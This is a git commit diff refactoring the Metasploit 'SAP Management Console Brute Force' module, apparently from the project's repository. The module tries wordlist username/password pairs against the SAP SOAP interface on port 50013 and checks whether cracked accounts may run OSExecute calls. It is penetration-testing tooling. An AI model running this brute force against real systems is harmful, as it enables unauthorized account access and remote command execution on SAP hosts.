Land #3422, SAP Bruterforcer datastore cleanup

2014-06-08 08:42:27 +02:00 · 2014-06-08 08:42:27 +02:00 · 099003708c
parent bf1a665259 b997c2ac1f
commit 099003708c
1 changed files with 27 additions and 37 deletions
--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
@ -16,13 +16,10 @@ class Metasploit4 < Msf::Auxiliary
    super(
      'Name'           => 'SAP Management Console Brute Force',
      'Description'    => %q{
-        This module simply attempts to brute force the username |
-        password for the SAP Management Console SOAP Interface. By
-        setting the SAP SID value, a list of default SAP users can be
-        tested without needing to set a USERNAME or USER_FILE value.
-        The default usernames are stored in
-        ./data/wordlists/sap_common.txt (the value of SAP SID is
-        automatically inserted into the username to replce <SAPSID>).
+        This module simply attempts to brute force the username and
+        password for the SAP Management Console SOAP Interface. If
+        the SAP_SID value is set it will replace instances of <SAPSID>
+        in any user/pass from any wordlist.
        },
      'References'     =>
        [
@ -36,49 +33,43 @@ class Metasploit4 < Msf::Auxiliary
    register_options(
      [
        Opt::RPORT(50013),
-        OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', '']),
-        OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
+        OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
+        OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
+        OptPath.new('USER_FILE', [ false, "File containing users, one per line",
+                                   File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
      ], self.class)
    register_autofilter_ports([ 50013 ])
  end

-  def run_host(ip)
+  def run_host(rhost)
+    uri = normalize_uri(target_uri.path)
    res = send_request_cgi({
-      'uri'     => normalize_uri(datastore['URI']),
+      'uri'     => uri,
      'method'  => 'GET'
-    }, 25)
+    })

    if not res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
      return
    end

-    if datastore['SAP_SID'] != ''
-      if !datastore['USER_FILE'].nil?
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
-      elsif !datastore['USERPASS_FILE'].nil?
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
-      else
-        print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist")
-        datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt'
-      end
-    end
+    print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']

    each_user_pass do |user, pass|
-      enum_user(user,pass)
+      enum_user(user,pass,uri)
    end

  end

-  def enum_user(user, pass)
+  def enum_user(user, pass, uri)

    # Replace placeholder with SAP SID, if present
-    if datastore['SAP_SID'] != ''
+    if datastore['SAP_SID']
      user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
      pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
    end

-    print_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
+    print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'")
    success = false

    soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
@ -103,7 +94,7 @@ class Metasploit4 < Msf::Auxiliary

    begin
      res = send_request_raw({
-        'uri'      => normalize_uri(datastore['URI']),
+        'uri'      => uri,
        'method'   => 'POST',
        'data'     => data,
        'headers'  =>
@ -113,9 +104,9 @@ class Metasploit4 < Msf::Auxiliary
            'Content-Type'   => 'text/xml; charset=UTF-8',
            'Authorization'  => 'Basic ' + user_pass
          }
-      }, 45)
+      })

-      return if not res
+      return unless res

      if (res.code != 500 and res.code != 200)
        return
@ -136,17 +127,17 @@ class Metasploit4 < Msf::Auxiliary
      end

    rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect")
+      print_error("#{peer} [SAP] Unable to connect")
      return
    end

    if success
-      print_good("#{rhost}:#{rport} [SAP] Successful login '#{user}' password: '#{pass}'")
+      print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")

      if permission
-        vprint_good("#{rhost}:#{rport} [SAP] Login '#{user}' authorized to perform OSExecute calls")
+        vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
      else
-        vprint_error("#{rhost}:#{rport} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
+        vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
      end

      report_auth_info(
@ -160,10 +151,9 @@ class Metasploit4 < Msf::Auxiliary
        :target_host => rhost,
        :target_port => rport
      )
-      return
    else
-      vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'")
-      return
+      vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
    end
  end
 end
+